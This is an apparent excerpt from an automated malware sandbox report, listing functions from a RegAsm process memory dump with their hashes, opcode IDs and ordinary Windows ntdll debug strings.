                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8e44ce0e29d9a1c1e5258deb970cee6f8f601386dd9bfb9afc2fdb2845546e35
                                                        • Instruction ID: a17ac758abc9963316dddbd2d902c0ce9aeeb6cb389c4563131cb94e7c7d896a
                                                        • Opcode Fuzzy Hash: 8e44ce0e29d9a1c1e5258deb970cee6f8f601386dd9bfb9afc2fdb2845546e35
                                                        • Instruction Fuzzy Hash: 4D90023129141402D581B1584405607000997D0241F95D012B5424554F86558B96EE61
                                                        Function 02E43D70 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2b6f09ff4b7c4570676e311eb92e82f2c475d60a78a2549fe1f710d84842674a
                                                        • Instruction ID: cd78c3f36df51928ce59905849541da38338cb405b2f829f95abbf299911b632
                                                        • Opcode Fuzzy Hash: 2b6f09ff4b7c4570676e311eb92e82f2c475d60a78a2549fe1f710d84842674a
                                                        • Instruction Fuzzy Hash: 3190023525141402D950B1585805647004687D0301F55E411B5424558E865489E1E521
                                                        Function 02E42C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction ID: 309ec2a0686d9b7c4641eb35a80ebeea7c55402de4fccfeec54c5783d764636d
                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction Fuzzy Hash:
                                                        Function 02E42890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: c82e42df96f954ed8dec6ef703589aaaa492e1bfe712a85ba6acd8d57c4384d6
                                                        • Instruction ID: 568fb4eb92b202e670b1ed7fa8e8d758fbf5aa91e183f0583d1a84c0985a16a2
                                                        • Opcode Fuzzy Hash: c82e42df96f954ed8dec6ef703589aaaa492e1bfe712a85ba6acd8d57c4384d6
                                                        • Instruction Fuzzy Hash: C551D6B2A40156AFDB10DFA8D89097EFBB8BB08304B50D269FA65D7741D734DE40CBA0
                                                        Function 02E37630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • ExecuteOptions, xrefs: 02E746A0
                                                        • Execute=1, xrefs: 02E74713
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02E74742
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02E746FC
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 02E74787
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02E74725
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02E74655
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: a684a422f53f545991444ff59213ef89ce2c650073b7064e26ab876a1c71e474
                                                        • Instruction ID: 629d6ae6772cad7f4cc4e13bb12220b0d28dd665a4bf3b881ab3f8aef2521003
                                                        • Opcode Fuzzy Hash: a684a422f53f545991444ff59213ef89ce2c650073b7064e26ab876a1c71e474
                                                        • Instruction Fuzzy Hash: BD511AB16C02197AEF11ABA4EC99FFDB3B9AF04309F0494A9E509A71C0DB709E45CF51
                                                        Function 02E4B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                        • Instruction ID: 5aae38b9eb0fdae05ff4f40118c027c761c0c9c466038234cbc5db602dce884c
                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                        • Instruction Fuzzy Hash: A881B170E852499ADF248F68E855BFEBBB2AF4531CF18E25DE851A7290CF34D840CB50
                                                        Function 02E2F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 02E7031E
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02E702E7
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02E702BD
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        • Opcode ID: cae3fc36694c50689527cd37b3e0c0aa625981b71107deac6ea7abadfb9d5f50
                                                        • Instruction ID: 8c4a6d27767ea042d2d34be0889ed3d5874a02f67c169b42ab1260c5f4697cbf
                                                        • Opcode Fuzzy Hash: cae3fc36694c50689527cd37b3e0c0aa625981b71107deac6ea7abadfb9d5f50
                                                        • Instruction Fuzzy Hash: B5E1DE316887419FD724CF28C884B6AB7F1FB84318F149A5DF5A68B6E1D774D848CB82
                                                        Function 02E3BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 02E77BAC
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02E77B7F
                                                        • RTL: Resource at %p, xrefs: 02E77B8E
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        • Opcode ID: 3bc36127e6639cc2127b100f9efa789ffdb2826a0ce23dbb985b5c896e34c65c
                                                        • Instruction ID: 007cc9e819012da413d44bd308c69e3031e03488e1c99bc611380d8e2bf25a47
                                                        • Opcode Fuzzy Hash: 3bc36127e6639cc2127b100f9efa789ffdb2826a0ce23dbb985b5c896e34c65c
                                                        • Instruction Fuzzy Hash: 9441D3313807029BD725DE26CC50B6AB7E6EF84719F00AA1DF95ADB680DB31E805CF91
                                                        Function 02E3B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E7728C
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 02E772C1
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02E77294
                                                        • RTL: Resource at %p, xrefs: 02E772A3
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        • Opcode ID: fff581696bd676fa105185ecc16bc18b37153462ef91172a307b5d0a340aa992
                                                        • Instruction ID: ecf8e5dbf8112ddfb3a4079908c6035704b04c2911f02bb6d01fb1a508953d2a
                                                        • Opcode Fuzzy Hash: fff581696bd676fa105185ecc16bc18b37153462ef91172a307b5d0a340aa992
                                                        • Instruction Fuzzy Hash: 1F412571780242ABDB11DE24CC41F66B7A5FF94729F10A61DFD6ADB240DB20E846CBD1
                                                        Function 02E47D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction ID: a2108023109410d9a5f8ef60e4669236a662a2fb1ec83500a0da6b786ab821da
                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction Fuzzy Hash: A8919470E802159ADB24DE6AE8807BEF7A5BF45728F54E71AE855E72C0DF309940CB90
                                                        Function 02E09126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        • Opcode ID: 6c4e8e11961712defa9e48b8d1c8a856b961fb21249437c0b68e51de9e340727
                                                        • Instruction ID: 08c90950a33ef105cbb7623b228c5c907d8fa8241ccafa80eea82517ca85288b
                                                        • Opcode Fuzzy Hash: 6c4e8e11961712defa9e48b8d1c8a856b961fb21249437c0b68e51de9e340727
                                                        • Instruction Fuzzy Hash: 21814C71D802699BDB35CF54CC44BEEB7B8AF08754F0091EAAA09B7281D7305E85CFA0